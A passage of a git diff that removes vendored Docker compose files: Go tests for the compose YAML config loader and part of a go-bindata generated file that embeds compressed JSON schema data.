-}
-
-func TestParseYAML(t *testing.T) {
-	dict, err := ParseYAML([]byte(sampleYAML))
-	if !assert.NoError(t, err) {
-		return
-	}
-	assert.Equal(t, sampleDict, dict)
-}
-
-func TestLoad(t *testing.T) {
-	actual, err := Load(buildConfigDetails(sampleDict))
-	if !assert.NoError(t, err) {
-		return
-	}
-	assert.Equal(t, serviceSort(sampleConfig.Services), serviceSort(actual.Services))
-	assert.Equal(t, sampleConfig.Networks, actual.Networks)
-	assert.Equal(t, sampleConfig.Volumes, actual.Volumes)
-}
-
-func TestLoadV31(t *testing.T) {
-	actual, err := loadYAML(`
-version: "3.1"
-services:
-  foo:
-    image: busybox
-    secrets: [super]
-secrets:
-  super:
-    external: true
-`)
-	if !assert.NoError(t, err) {
-		return
-	}
-	assert.Equal(t, len(actual.Services), 1)
-	assert.Equal(t, len(actual.Secrets), 1)
-}
-
-func TestParseAndLoad(t *testing.T) {
-	actual, err := loadYAML(sampleYAML)
-	if !assert.NoError(t, err) {
-		return
-	}
-	assert.Equal(t, serviceSort(sampleConfig.Services), serviceSort(actual.Services))
-	assert.Equal(t, sampleConfig.Networks, actual.Networks)
-	assert.Equal(t, sampleConfig.Volumes, actual.Volumes)
-}
-
-func TestInvalidTopLevelObjectType(t *testing.T) {
-	_, err := loadYAML("1")
-	assert.Error(t, err)
-	assert.Contains(t, err.Error(), "Top-level object must be a mapping")
-
-	_, err = loadYAML("\"hello\"")
-	assert.Error(t, err)
-	assert.Contains(t, err.Error(), "Top-level object must be a mapping")
-
-	_, err = loadYAML("[\"hello\"]")
-	assert.Error(t, err)
-	assert.Contains(t, err.Error(), "Top-level object must be a mapping")
-}
-
-func TestNonStringKeys(t *testing.T) {
-	_, err := loadYAML(`
-version: "3"
-123:
-  foo:
-    image: busybox
-`)
-	assert.Error(t, err)
-	assert.Contains(t, err.Error(), "Non-string key at top level: 123")
-
-	_, err = loadYAML(`
-version: "3"
-services:
-  foo:
-    image: busybox
-  123:
-    image: busybox
-`)
-	assert.Error(t, err)
-	assert.Contains(t, err.Error(), "Non-string key in services: 123")
-
-	_, err = loadYAML(`
-version: "3"
-services:
-  foo:
-    image: busybox
-networks:
-  default:
-    ipam:
-      config:
-        - 123: oh dear
-`)
-	assert.Error(t, err)
-	assert.Contains(t, err.Error(), "Non-string key in networks.default.ipam.config[0]: 123")
-
-	_, err = loadYAML(`
-version: "3"
-services:
-  dict-env:
-    image: busybox
-    environment:
-      1: FOO
-`)
-	assert.Error(t, err)
-	assert.Contains(t, err.Error(), "Non-string key in services.dict-env.environment: 1")
-}
-
-func TestSupportedVersion(t *testing.T) {
-	_, err := loadYAML(`
-version: "3"
-services:
-  foo:
-    image: busybox
-`)
-	assert.NoError(t, err)
-
-	_, err = loadYAML(`
-version: "3.0"
-services:
-  foo:
-    image: busybox
-`)
-	assert.NoError(t, err)
-}
-
-func TestUnsupportedVersion(t *testing.T) {
-	_, err := loadYAML(`
-version: "2"
-services:
-  foo:
-    image: busybox
-`)
-	assert.Error(t, err)
-	assert.Contains(t, err.Error(), "version")
-
-	_, err = loadYAML(`
-version: "2.0"
-services:
-  foo:
-    image: busybox
-`)
-	assert.Error(t, err)
-	assert.Contains(t, err.Error(), "version")
-}
-
-func TestInvalidVersion(t *testing.T) {
-	_, err := loadYAML(`
-version: 3
-services:
-  foo:
-    image: busybox
-`)
-	assert.Error(t, err)
-	assert.Contains(t, err.Error(), "version must be a string")
-}
-
-func TestV1Unsupported(t *testing.T) {
-	_, err := loadYAML(`
-foo:
-  image: busybox
-`)
-	assert.Error(t, err)
-}
-
-func TestNonMappingObject(t *testing.T) {
-	_, err := loadYAML(`
-version: "3"
-services:
-  - foo:
-      image: busybox
-`)
-	assert.Error(t, err)
-	assert.Contains(t, err.Error(), "services must be a mapping")
-
-	_, err = loadYAML(`
-version: "3"
-services:
-  foo: busybox
-`)
-	assert.Error(t, err)
-	assert.Contains(t, err.Error(), "services.foo must be a mapping")
-
-	_, err = loadYAML(`
-version: "3"
-networks:
-  - default:
-      driver: bridge
-`)
-	assert.Error(t, err)
-	assert.Contains(t, err.Error(), "networks must be a mapping")
-
-	_, err = loadYAML(`
-version: "3"
-networks:
-  default: bridge
-`)
-	assert.Error(t, err)
-	assert.Contains(t, err.Error(), "networks.default must be a mapping")
-
-	_, err = loadYAML(`
-version: "3"
-volumes:
-  - data:
-      driver: local
-`)
-	assert.Error(t, err)
-	assert.Contains(t, err.Error(), "volumes must be a mapping")
-
-	_, err = loadYAML(`
-version: "3"
-volumes:
-  data: local
-`)
-	assert.Error(t, err)
-	assert.Contains(t, err.Error(), "volumes.data must be a mapping")
-}
-
-func TestNonStringImage(t *testing.T) {
-	_, err := loadYAML(`
-version: "3"
-services:
-  foo:
-    image: ["busybox", "latest"]
-`)
-	assert.Error(t, err)
-	assert.Contains(t, err.Error(), "services.foo.image must be a string")
-}
-
-func TestValidEnvironment(t *testing.T) {
-	config, err := loadYAML(`
-version: "3"
-services:
-  dict-env:
-    image: busybox
-    environment:
-      FOO: "1"
-      BAR: 2
-      BAZ: 2.5
-      QUUX:
-  list-env:
-    image: busybox
-    environment:
-      - FOO=1
-      - BAR=2
-      - BAZ=2.5
-      - QUUX=
-`)
-	assert.NoError(t, err)
-
-	expected := map[string]string{
-		"FOO":  "1",
-		"BAR":  "2",
-		"BAZ":  "2.5",
-		"QUUX": "",
-	}
-
-	assert.Equal(t, 2, len(config.Services))
-
-	for _, service := range config.Services {
-		assert.Equal(t, expected, service.Environment)
-	}
-}
-
-func TestInvalidEnvironmentValue(t *testing.T) {
-	_, err := loadYAML(`
-version: "3"
-services:
-  dict-env:
-    image: busybox
-    environment:
-      FOO: ["1"]
-`)
-	assert.Error(t, err)
-	assert.Contains(t, err.Error(), "services.dict-env.environment.FOO must be a string, number or null")
-}
-
-func TestInvalidEnvironmentObject(t *testing.T) {
-	_, err := loadYAML(`
-version: "3"
-services:
-  dict-env:
-    image: busybox
-    environment: "FOO=1"
-`)
-	assert.Error(t, err)
-	assert.Contains(t, err.Error(), "services.dict-env.environment must be a mapping")
-}
-
-func TestEnvironmentInterpolation(t *testing.T) {
-	config, err := loadYAML(`
-version: "3"
-services:
-  test:
-    image: busybox
-    labels:
-      - home1=$HOME
-      - home2=${HOME}
-      - nonexistent=$NONEXISTENT
-      - default=${NONEXISTENT-default}
-networks:
-  test:
-    driver: $HOME
-volumes:
-  test:
-    driver: $HOME
-`)
-
-	assert.NoError(t, err)
-
-	home := os.Getenv("HOME")
-
-	expectedLabels := map[string]string{
-		"home1":       home,
-		"home2":       home,
-		"nonexistent": "",
-		"default":     "default",
-	}
-
-	assert.Equal(t, expectedLabels, config.Services[0].Labels)
-	assert.Equal(t, home, config.Networks["test"].Driver)
-	assert.Equal(t, home, config.Volumes["test"].Driver)
-}
-
-func TestUnsupportedProperties(t *testing.T) {
-	dict, err := ParseYAML([]byte(`
-version: "3"
-services:
-  web:
-    image: web
-    build: ./web
-    links:
-      - bar
-  db:
-    image: db
-    build: ./db
-`))
-	assert.NoError(t, err)
-
-	configDetails := buildConfigDetails(dict)
-
-	_, err = Load(configDetails)
-	assert.NoError(t, err)
-
-	unsupported := GetUnsupportedProperties(configDetails)
-	assert.Equal(t, []string{"build", "links"}, unsupported)
-}
-
-func TestDeprecatedProperties(t *testing.T) {
-	dict, err := ParseYAML([]byte(`
-version: "3"
-services:
-  web:
-    image: web
-    container_name: web
-  db:
-    image: db
-    container_name: db
-    expose: ["5434"]
-`))
-	assert.NoError(t, err)
-
-	configDetails := buildConfigDetails(dict)
-
-	_, err = Load(configDetails)
-	assert.NoError(t, err)
-
-	deprecated := GetDeprecatedProperties(configDetails)
-	assert.Equal(t, 2, len(deprecated))
-	assert.Contains(t, deprecated, "container_name")
-	assert.Contains(t, deprecated, "expose")
-}
-
-func TestForbiddenProperties(t *testing.T) {
-	_, err := loadYAML(`
-version: "3"
-services:
-  foo:
-    image: busybox
-    volumes:
-      - /data
-    volume_driver: some-driver
-  bar:
-    extends:
-      service: foo
-`)
-
-	assert.Error(t, err)
-	assert.IsType(t, &ForbiddenPropertiesError{}, err)
-	fmt.Println(err)
-	forbidden := err.(*ForbiddenPropertiesError).Properties
-
-	assert.Equal(t, 2, len(forbidden))
-	assert.Contains(t, forbidden, "volume_driver")
-	assert.Contains(t, forbidden, "extends")
-}
-
-func durationPtr(value time.Duration) *time.Duration {
-	return &value
-}
-
-func int64Ptr(value int64) *int64 {
-	return &value
-}
-
-func uint64Ptr(value uint64) *uint64 {
-	return &value
-}
-
-func TestFullExample(t *testing.T) {
-	bytes, err := ioutil.ReadFile("full-example.yml")
-	assert.NoError(t, err)
-
-	config, err := loadYAML(string(bytes))
-	if !assert.NoError(t, err) {
-		return
-	}
-
-	workingDir, err := os.Getwd()
-	assert.NoError(t, err)
-
-	homeDir := os.Getenv("HOME")
-	stopGracePeriod := time.Duration(20 * time.Second)
-
-	expectedServiceConfig := types.ServiceConfig{
-		Name: "foo",
-
-		CapAdd:        []string{"ALL"},
-		CapDrop:       []string{"NET_ADMIN", "SYS_ADMIN"},
-		CgroupParent:  "m-executor-abcd",
-		Command:       []string{"bundle", "exec", "thin", "-p", "3000"},
-		ContainerName: "my-web-container",
-		DependsOn:     []string{"db", "redis"},
-		Deploy: types.DeployConfig{
-			Mode:     "replicated",
-			Replicas: uint64Ptr(6),
-			Labels:   map[string]string{"FOO": "BAR"},
-			UpdateConfig: &types.UpdateConfig{
-				Parallelism:     uint64Ptr(3),
-				Delay:           time.Duration(10 * time.Second),
-				FailureAction:   "continue",
-				Monitor:         time.Duration(60 * time.Second),
-				MaxFailureRatio: 0.3,
-			},
-			Resources: types.Resources{
-				Limits: &types.Resource{
-					NanoCPUs:    "0.001",
-					MemoryBytes: 50 * 1024 * 1024,
-				},
-				Reservations: &types.Resource{
-					NanoCPUs:    "0.0001",
-					MemoryBytes: 20 * 1024 * 1024,
-				},
-			},
-			RestartPolicy: &types.RestartPolicy{
-				Condition:   "on_failure",
-				Delay:       durationPtr(5 * time.Second),
-				MaxAttempts: uint64Ptr(3),
-				Window:      durationPtr(2 * time.Minute),
-			},
-			Placement: types.Placement{
-				Constraints: []string{"node=foo"},
-			},
-		},
-		Devices:    []string{"/dev/ttyUSB0:/dev/ttyUSB0"},
-		DNS:        []string{"8.8.8.8", "9.9.9.9"},
-		DNSSearch:  []string{"dc1.example.com", "dc2.example.com"},
-		DomainName: "foo.com",
-		Entrypoint: []string{"/code/entrypoint.sh", "-p", "3000"},
-		Environment: map[string]string{
-			"RACK_ENV":       "development",
-			"SHOW":           "true",
-			"SESSION_SECRET": "",
-			"FOO":            "1",
-			"BAR":            "2",
-			"BAZ":            "3",
-		},
-		Expose: []string{"3000", "8000"},
-		ExternalLinks: []string{
-			"redis_1",
-			"project_db_1:mysql",
-			"project_db_1:postgresql",
-		},
-		ExtraHosts: map[string]string{
-			"otherhost": "50.31.209.229",
-			"somehost":  "162.242.195.82",
-		},
-		HealthCheck: &types.HealthCheckConfig{
-			Test: []string{
-				"CMD-SHELL",
-				"echo \"hello world\"",
-			},
-			Interval: "10s",
-			Timeout:  "1s",
-			Retries:  uint64Ptr(5),
-		},
-		Hostname: "foo",
-		Image:    "redis",
-		Ipc:      "host",
-		Labels: map[string]string{
-			"com.example.description": "Accounting webapp",
-			"com.example.number":      "42",
-			"com.example.empty-label": "",
-		},
-		Links: []string{
-			"db",
-			"db:database",
-			"redis",
-		},
-		Logging: &types.LoggingConfig{
-			Driver: "syslog",
-			Options: map[string]string{
-				"syslog-address": "tcp://192.168.0.42:123",
-			},
-		},
-		MacAddress:  "02:42:ac:11:65:43",
-		NetworkMode: "container:0cfeab0f748b9a743dc3da582046357c6ef497631c1a016d28d2bf9b4f899f7b",
-		Networks: map[string]*types.ServiceNetworkConfig{
-			"some-network": {
-				Aliases:     []string{"alias1", "alias3"},
-				Ipv4Address: "",
-				Ipv6Address: "",
-			},
-			"other-network": {
-				Ipv4Address: "172.16.238.10",
-				Ipv6Address: "2001:3984:3989::10",
-			},
-			"other-other-network": nil,
-		},
-		Pid: "host",
-		Ports: []string{
-			"3000",
-			"3000-3005",
-			"8000:8000",
-			"9090-9091:8080-8081",
-			"49100:22",
-			"127.0.0.1:8001:8001",
-			"127.0.0.1:5000-5010:5000-5010",
-		},
-		Privileged: true,
-		ReadOnly:   true,
-		Restart:    "always",
-		SecurityOpt: []string{
-			"label=level:s0:c100,c200",
-			"label=type:svirt_apache_t",
-		},
-		StdinOpen:       true,
-		StopSignal:      "SIGUSR1",
-		StopGracePeriod: &stopGracePeriod,
-		Tmpfs:           []string{"/run", "/tmp"},
-		Tty:             true,
-		Ulimits: map[string]*types.UlimitsConfig{
-			"nproc": {
-				Single: 65535,
-			},
-			"nofile": {
-				Soft: 20000,
-				Hard: 40000,
-			},
-		},
-		User: "someone",
-		Volumes: []string{
-			"/var/lib/mysql",
-			"/opt/data:/var/lib/mysql",
-			fmt.Sprintf("%s:/code", workingDir),
-			fmt.Sprintf("%s/static:/var/www/html", workingDir),
-			fmt.Sprintf("%s/configs:/etc/configs/:ro", homeDir),
-			"datavolume:/var/lib/mysql",
-		},
-		WorkingDir: "/code",
-	}
-
-	assert.Equal(t, []types.ServiceConfig{expectedServiceConfig}, config.Services)
-
-	expectedNetworkConfig := map[string]types.NetworkConfig{
-		"some-network": {},
-
-		"other-network": {
-			Driver: "overlay",
-			DriverOpts: map[string]string{
-				"foo": "bar",
-				"baz": "1",
-			},
-			Ipam: types.IPAMConfig{
-				Driver: "overlay",
-				Config: []*types.IPAMPool{
-					{Subnet: "172.16.238.0/24"},
-					{Subnet: "2001:3984:3989::/64"},
-				},
-			},
-		},
-
-		"external-network": {
-			External: types.External{
-				Name:     "external-network",
-				External: true,
-			},
-		},
-
-		"other-external-network": {
-			External: types.External{
-				Name:     "my-cool-network",
-				External: true,
-			},
-		},
-	}
-
-	assert.Equal(t, expectedNetworkConfig, config.Networks)
-
-	expectedVolumeConfig := map[string]types.VolumeConfig{
-		"some-volume": {},
-		"other-volume": {
-			Driver: "flocker",
-			DriverOpts: map[string]string{
-				"foo": "bar",
-				"baz": "1",
-			},
-		},
-		"external-volume": {
-			External: types.External{
-				Name:     "external-volume",
-				External: true,
-			},
-		},
-		"other-external-volume": {
-			External: types.External{
-				Name:     "my-cool-volume",
-				External: true,
-			},
-		},
-	}
-
-	assert.Equal(t, expectedVolumeConfig, config.Volumes)
-}
-
-func loadYAML(yaml string) (*types.Config, error) {
-	dict, err := ParseYAML([]byte(yaml))
-	if err != nil {
-		return nil, err
-	}
-
-	return Load(buildConfigDetails(dict))
-}
-
-func serviceSort(services []types.ServiceConfig) []types.ServiceConfig {
-	sort.Sort(servicesByName(services))
-	return services
-}
-
-type servicesByName []types.ServiceConfig
-
-func (sbn servicesByName) Len() int           { return len(sbn) }
-func (sbn servicesByName) Swap(i, j int)      { sbn[i], sbn[j] = sbn[j], sbn[i] }
-func (sbn servicesByName) Less(i, j int) bool { return sbn[i].Name < sbn[j].Name }
diff --git a/vendor/github.com/docker/docker/cli/compose/schema/bindata.go b/vendor/github.com/docker/docker/cli/compose/schema/bindata.go
deleted file mode 100644
index 9486e91ae0..0000000000
--- a/vendor/github.com/docker/docker/cli/compose/schema/bindata.go
+++ /dev/null
@@ -1,260 +0,0 @@
-// Code generated by go-bindata.
-// sources:
-// data/config_schema_v3.0.json
-// data/config_schema_v3.1.json
-// DO NOT EDIT!
-
-package schema
-
-import (
-	"bytes"
-	"compress/gzip"
-	"fmt"
-	"io"
-	"io/ioutil"
-	"os"
-	"path/filepath"
-	"strings"
-	"time"
-)
-
-func bindataRead(data []byte, name string) ([]byte, error) {
-	gz, err := gzip.NewReader(bytes.NewBuffer(data))
-	if err != nil {
-		return nil, fmt.Errorf("Read %q: %v", name, err)
-	}
-
-	var buf bytes.Buffer
-	_, err = io.Copy(&buf, gz)
-	clErr := gz.Close()
-
-	if err != nil {
-		return nil, fmt.Errorf("Read %q: %v", name, err)
-	}
-	if clErr != nil {
-		return nil, err
-	}
-
-	return buf.Bytes(), nil
-}
-
-type asset struct {
-	bytes []byte
-	info  os.FileInfo
-}
-
-type bindataFileInfo struct {
-	name    string
-	size    int64
-	mode    os.FileMode
-	modTime time.Time
-}
-
-func (fi bindataFileInfo) Name() string {
-	return fi.name
-}
-func (fi bindataFileInfo) Size() int64 {
-	return fi.size
-}
-func (fi bindataFileInfo) Mode() os.FileMode {
-	return fi.mode
-}
-func (fi bindataFileInfo) ModTime() time.Time {
-	return fi.modTime
-}
-func (fi bindataFileInfo) IsDir() bool {
-	return false
-}
-func (fi bindataFileInfo) Sys() interface{} {
-	return nil
-}
-
-var _dataConfig_schema_v30Json = []byte("\x1f\x8b\x08\x00\x00\x09\x6e\x88\x00\xff\xec\x5a\x4f\x8f\xdb\xb8\x0e\xbf\xe7\x53\x18\x6e\x6f\xcd\xcc\x14\x78\xc5\x03\x5e\x6f\xef\xb8\xa7\xdd\xf3\x0e\x5c\x43\xb1\x99\x44\x1d\x59\x52\x29\x39\x9d\xb4\xc8\x77\x5f\xc8\xff\x22\x2b\x92\xe5\x24\xee\xb6\x87\x9e\x66\x62\x91\x14\xff\xe9\x47\x8a\xf6\xf7\x55\x92\xa4\x6f\x55\xb1\x87\x8a\xa4\x1f\x93\x74\xaf\xb5\xfc\xf8\xf4\xf4\x59\x09\xfe\xd0\x3e\x7d\x14\xb8\x7b\x2a\x91\x6c\xf5\xc3\xfb\x0f\x4f\xed\xb3\x37\xe9\xda\xf0\xd1\xd2\xb0\x14\x82\x6f\xe9\x2e\x6f\x57\xf2\xc3\x7f\x1e\xdf\x3f\x1a\xf6\x96\x44\x1f\x25\x18\x22\xb1\xf9\x0c\x85\x6e\x9f\x21\x7c\xa9\x29\x82\x61\x7e\x4e\x0f\x80\x8a\x0a\x9e\x66\xeb\x95\x59\x93\x28\x24\xa0\xa6\xa0\xd2\x8f\x89\x51\x2e\x49\x06\x92\xfe\x81\x25\x56\x69\xa4\x7c\x97\x36\x8f\x4f\x8d\x84\x24\x49\x15\xe0\x81\x16\x96\x84\x41\xd5\x37\x4f\x67\xf9\x4f\x03\xd9\xda\x95\x6a\x29\xdb\x3c\x97\x44\x6b\x40\xfe\xd7\xa5\x6e\xcd\xf2\xa7\x67\xf2\xf0\xed\xff\x0f\x7f\xbf\x7f\xf8\xdf\x63\xfe\x90\xbd\x7b\x3b\x5a\x36\xfe\x45\xd8\xb6\xdb\x97\xb0\xa5\x9c\x6a\x2a\xf8\xb0\x7f\x3a\x50\x9e\xba\xff\x4e\xc3\xc6\xa4\x2c\x1b\x62\xc2\x46\x7b\x6f\x09\x53\x30\xb6\x99\x83\xfe\x2a\xf0\x25\x66\xf3\x40\xf6\x93\x6c\xee\xf6\xf7\xd8\x3c\x36\xe7\x20\x58\x5d\x45\x23\xd8\x53\xfd\x24\x63\xda\xed\xef\x8b\xdf\xaa\x37\x7a\x92\xb6\xa5\xb0\xf6\x6e\x14\x1c\x65\xbb\xcf\x55\xbe\x6c\x0b\xfb\x6a\x70\x56\xc0\x4b\x25\x48\x26\x8e\xe6\x59\xc0\x1f\x2d\x41\x05\x5c\xa7\x83\x0b\x92\x24\xdd\xd4\x94\x95\xae\x47\x05\x87\x3f\x8d\x88\x67\xeb\x61\x92\x7c\x77\x0f\xb6\x25\xa7\x59\x1f\xfd\x0a\x07\x7c\x58\x0f\xd8\x32\xac\x17\x82\x6b\x78\xd5\x8d\x51\xd3\x5b\xb7\x2e\x10\xc5\x0b\xe0\x96\x32\x98\xcb\x41\x70\xa7\x26\x5c\xc6\xa8\xd2\xb9\xc0\xbc\xa4\x85\x4e\x4f\x0e\xfb\x85\xbc\x78\x3e\x0d\xac\xd6\xaf\x6c\xe5\x11\x98\x16\x44\xe6\xa4\x2c\x47\x76\x10\x44\x72\x4c\xd7\x49\x4a\x35\x54\xca\x6f\x62\x92\xd6\x9c\x7e\xa9\xe1\x8f\x8e\x44\x63\x0d\xae\xdc\x12\x85\x5c\x5e\xf0\x0e\x45\x2d\x73\x49\xd0\x24\xd8\xb4\xfb\xd3\x42\x54\x15\xe1\x4b\x65\xdd\x35\x76\xcc\xf0\xbc\xe0\x9a\x50\x0e\x98\x73\x52\xc5\x12\xc9\x9c\x3a\xe0\xa5\xca\xdb\xfa\x37\x99\x46\xdb\xbc\xe5\x57\x8e\x80\xa1\x18\x2e\x1a\x8f\x92\x4f\x25\x76\x2b\xc6\xa4\xb6\xd1\x2d\x75\x18\x73\x05\x04\x8b\xfd\x8d\xfc\xa2\x22\x94\xcf\xf1\x1d\x70\x8d\x47\x29\x68\x9b\x2f\xbf\x5c\x22\x00\x3f\xe4\x03\x96\x5c\xed\x06\xe0\x07\x8a\x82\x57\xfd\x69\x98\x03\x30\x03\xc8\x1b\xfe\x57\x29\x14\xb8\x8e\x71\x0c\xb4\x97\x06\x53\x47\x3e\xe9\x39\x9e\x7b\xc3\xd7\x49\xca\xeb\x6a\x03\x68\x5a\xba\x11\xe5\x56\x60\x45\x8c\xb2\xfd\xde\xd6\xf2\xc8\xd3\x9e\xcc\xb3\x1d\x68\xdb\x60\xca\x3a\x61\x39\xa3\xfc\x65\xf9\x14\x87\x57\x8d\x24\xdf\x0b\xa5\xe7\x63\xb8\xc5\xbe\x07\xc2\xf4\xbe\xd8\x43\xf1\x32\xc1\x6e\x53\x8d\xb8\x85\xd2\x73\x92\x9c\x56\x64\x17\x27\x92\x45\x8c\x84\x91\x0d\xb0\x9b\xec\x5c\xd4\xf9\x96\x58\xb1\xdb\x19\xd2\x50\xc6\x5d\x74\x2e\xdd\x72\xac\xe6\x97\x48\x0f\x80\x73\x0b\xb8\x90\xe7\x86\xcb\x5d\x8c\x37\x20\x49\xbc\xfb\x1c\x91\x7e\x7a\x6c\x9b\xcf\x89\x53\xd5\xfc\xc7\x58\x9a\xb9\xed\x42\xe2\xd4\x7d\xdf\x13\xc7\xc2\x79\x0d\xc5\x28\x2a\x15\x29\x4c\xdf\x80\xa0\x02\x71\x3d\x93\x76\xcd\x7e\x5e\x89\x32\x94\xa0\x17\xc4\xae\x6f\x82\x48\x7d\x75\x21\x4c\x6e\xea\x1f\x67\x85\x2e\x7a\x81\x88\x58\x13\x52\x6f\xae\x9a\x67\x75\xe3\x29\xd6\xd0\x11\x46\x89\x82\xf8\x61\x0f\x3a\x72\x24\x8d\xca\xc3\x87\x99\x39\xe1\xe3\xfd\xef\x24\x6f\x80\x35\x28\x73\x7e\x8f\x1c\x11\x75\x56\xa5\x39\x6e\x3e\x45\xb2\xc8\x69\xfb\xc1\x2d\xbc\xa4\x65\x18\x2b\x1a\x84\xb0\x0f\x98\x14\xa8\x2f\x4e\xd7\xbf\x53\xee\xdb\xad\xef\xae\xf6\x12\xe9\x81\x32\xd8\xc1\xf8\xd6\xb2\x11\x82\x01\xe1\x23\xe8\x41\x20\x65\x2e\x38\x3b\xce\xa0\x54\x9a\x60\xf4\x42\xa1\xa0\xa8\x91\xea\x63\x2e\xa4\x5e\xbc\xcf\x50\xfb\x2a\x57\xf4\x1b\x8c\xa3\x79\xc6\xfb\x4e\x50\x36\xe2\x39\xaa\x42\xdf\x56\xaf\x95\x2e\x29\xcf\x85\x04\x1e\xf5\x8e\xd2\x42\xe6\x3b\x24\x05\xe4\x12\x90\x8a\xd2\x67\xe0\xda\x8e\x75\x59\x23\x31\xfb\x5f\x8a\x51\x74\xc7\x09\x8b\x39\x5a\x57\x72\x7b\xe3\xc5\x42\xeb\x78\xb8\x6b\x46\x2b\x1a\x3e\x07\x1e\x80\x9d\x51\x03\x5a\xfc\xf7\xc3\xfe\x04\xe4\x9f\x35\xa5\x5c\xc3\x0e\xd0\x87\x94\x13\x5d\xc7\x74\xd3\x31\xa3\xdb\xd8\x13\x1c\x07\x74\x42\x8f\x86\x41\x89\xad\xf6\x33\xf8\x7a\x11\xaf\x5e\xa3\xe1\x6f\x23\x6f\xdd\x29\x92\x79\xe9\xaf\x82\x73\x57\x8d\x2c\x88\xa8\x27\x2f\xa2\xd6\x2a\xda\x18\x36\x34\x5c\x4d\x35\x35\x03\xa9\x35\xc5\x5c\x14\x2f\x4c\xa3\x64\x0e\x41\x49\xfd\xda\xae\x1c\xcb\xae\x98\x23\x3b\x77\x96\x5e\x80\x6f\xa2\x68\x93\x46\x27\xb0\xd3\xd3\xcd\x8e\x28\x38\x79\xa4\x8a\x6c\x9c\x99\x9b\xef\x70\x9b\x6c\xc4\x43\x1c\x63\x10\x34\x52\x27\x2e\x1d\xda\x8e\xf0\x04\xd4\xaf\x39\x38\xd0\xb4\x02\x51\xfb\x6b\xd6\xca\xce\xef\x8e\x29\xb5\x26\xb3\x91\xa0\x5a\x94\x6e\x4c\x9f\x87\xa0\xf6\xfd\x45\x34\x70\x73\x0e\x09\x82\x64\xb4\x20\x2a\x06\x44\x77\x5c\x50\x6b\x59\x12\x0d\x79\xfb\xa2\xea\x2a\xe8\x9f\xc0\x7c\x49\x90\x30\x06\x8c\xaa\x6a\x0e\x86\xa6\x25\x30\x72\xbc\xa9\x7c\x36\xec\x5b\x42\x59\x8d\x90\x93\x42\x77\xef\xc2\x22\x39\x97\x56\x82\x53\x2d\xbc\x08\x31\x6f\xcb\x8a\xbc\xe6\xfd\xb6\x0d\x89\xf7\xc0\x04\xdb\xba\xb9\x77\x4b\x2b\x13\x94\xa8\xb1\xb8\x70\xf6\xcd\x21\x3a\xd7\xfa\x40\xc6\xf4\x3b\x5e\x98\x8e\xa0\x0c\x92\x0c\x57\xff\x28\x7f\xb4\xb4\x74\x7d\x66\x2e\x05\xa3\xc5\x71\x29\x0b\x0b\xc1\x5b\x27\xcf\x49\x88\x3b\x33\xd0\xa4\x83\x69\x85\x2a\xa9\xa3\x87\xb5\x61\xf8\x4a\x79\x29\xbe\x5e\xb1\xe1\x72\xa9\x24\x19\x29\xc0\xc1\xbb\x7b\x1d\xad\x34\x12\xca\xf5\xd5\xe5\xfc\x5e\xb3\xee\xa8\xe6\x43\x7e\x46\x50\x7f\xa0\x8b\xbf\x49\x0d\x20\x7d\x21\xeb\xe8\x3c\xa8\x82\x4a\xa0\x37\x01\x17\x78\xf3\x1d\x33\xb1\x27\x5b\xa0\xaa\xcd\x1a\x20\x76\x54\xe6\xbe\xb8\xf8\x6d\x23\x3e\x24\xcc\xe2\x80\x44\x25\xa9\x96\x3a\x1d\xb3\x47\xaa\xa9\xb7\x06\x27\xd3\xa3\x88\x24\x3c\x8e\x88\x69\x1d\xd7\xbd\xa3\x50\xf5\x86\xc3\x64\x47\x65\xf9\xd3\xf7\x9e\x77\xfe\x35\xe5\x14\xbe\x94\xdc\x07\x7a\xfd\xdb\x90\x40\x54\x9f\x87\x9e\x79\x3d\xf8\x2a\x9b\x1d\xe2\xe0\xab\x88\xe5\xf4\xbf\xb2\xc1\xbb\x03\x33\xba\x2f\x37\x22\x90\xd1\x51\xfd\x46\x8c\xdf\xf9\x75\x65\x7e\x39\x43\x2a\x2b\xcf\x2e\xef\x8f\x53\x29\x31\x7b\x3a\xdf\x71\x64\x63\x35\x5c\x32\xcf\x07\x74\x63\xb4\x9d\x1a\x4a\xf4\x24\x81\x69\xad\xb3\x69\xe7\xc4\x69\xcb\x17\xcc\xf0\xc7\x77\x13\x35\x65\xea\x2d\xda\x0f\x02\xe3\x05\x06\x3e\xfe\x98\x3a\x8d\x68\xef\xdd\xcb\xaf\xc0\x02\xa0\x66\xf1\x5f\x7c\x13\x66\xec\xe4\xc7\x8b\xf9\xc6\xf7\xf1\xd0\xae\xfd\x9e\x2b\x1b\xf9\xc7\x21\x69\xdf\x49\x5b\x90\x92\xd9\xbd\x79\x28\x8c\xde\x2f\xc5\xdc\x91\x61\xff\xc5\x56\xe6\x87\xab\x95\xfd\xb7\xf9\xba\x6e\x75\x5a\xfd\x13\x00\x00\xff\xff\x46\xf7\x7b\x23\xe5\x2a\x00\x00")
-
-func dataConfig_schema_v30JsonBytes() ([]byte, error) {
-	return bindataRead(
-		_dataConfig_schema_v30Json,
-		"data/config_schema_v3.0.json",
-	)
-}
-
-func dataConfig_schema_v30Json() (*asset, error) {
-	bytes, err := dataConfig_schema_v30JsonBytes()
-	if err != nil {
-		return nil, err
-	}
-
-	info := bindataFileInfo{name: "data/config_schema_v3.0.json", size: 0, mode: os.FileMode(0), modTime: time.Unix(0, 0)}
-	a := &asset{bytes: bytes, info: info}
-	return a, nil
-}
-
-var _dataConfig_schema_v31Json = 